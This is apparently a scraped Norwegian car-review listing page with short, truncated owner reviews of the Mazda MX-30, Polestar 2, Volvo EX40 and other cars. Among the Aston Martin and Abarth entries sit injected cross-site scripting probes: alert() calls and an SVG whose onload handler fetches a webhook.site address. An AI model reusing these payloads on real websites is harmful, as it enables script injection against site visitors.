Vurdert av ADI11
Mazda MX-30 (2024)
En bil man blir glad i. Perfekt bil nummer to for en familie, eller bybil.
Mazda MX-30 (2023)
Ikke den peneste, raskeste, største eller mest praktiske bilen jeg har eid. Uansett den desidert beste bilen for pendlerkjøring i nærmiljøet inntil 15 mil om dagen vinterstid, man når også 20 mi
Mazda MX-30 (2023)
Hatt MX-30 i 2 år og det har vært en økonomisk glede å ha en så billig bil. Utstyret er ganske bedre enn man kan forvente i denne prisklassen. Rekkevidden er selvsagt dårlig, og det kunne ikke f
Mazda MX-30 (2023)
Svært god bil å kjøre. Barna har greit med plass i baksetene. Mangler tilkopling for lading av nettbrett og telefon i baksetet. God plass i bagasjerommet. 2023/24 versjonen støtter 400v trefaselad
Mazda MX-30 (2022)
Kjøpte den ny i 2022, har etter 3 1/2 år og 67000 km ikke opplevd noe feil. Billige servicer, god comfort og høy kvalitet. Strålende fornøyd bortsett fra rekkevidde om vinteren.
Mazda MX-30 (2022)
Selvsagt ikke bilen med lengst rekkevidde, men dette vet man når en kjøper bilen. Til vanlig bruk vil denne rekkevidden holde for svært mange, og til mitt bruk er den perfekt. Nydelig bil både
Mazda MX-30 (2021)
God bil! Godt utstyrt. Kvalitet. God å kjøre . Trangt baksete. Kule, men upraktiske bakdører. Litt høyt forbruk.
Mazda MX-30 (2021)
Nærmest perfekt når ikke hverdagene bare består av langkjøring.
Mazda MX-30 (2021)
Godt fornøyd med kjøpet, var klar over relativt kort kjørelengde. Brukes uansett aldri til mer enn tur / retur jobb + noe småkjøring på kvelder. Relativt kraftig ombordlader i forhold til bmw i
Mazda MX-30 (2021)
Solgte den etter 1 mnd.
Mazda MX-30 (2020)
Super bil for pengene
Mazda MX-30 (2020)
Rimelig luksusfølelse for dem som ikke kjører mer enn 80 km hver dag
Mazda MX-30 (2020)
Passer perfekt som pendlerbil og til småkjøring. Pendlerbilen er umiddelbart blitt familiens favoritt.
Mazda MX-30 (2020)
Billig og god elbil
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat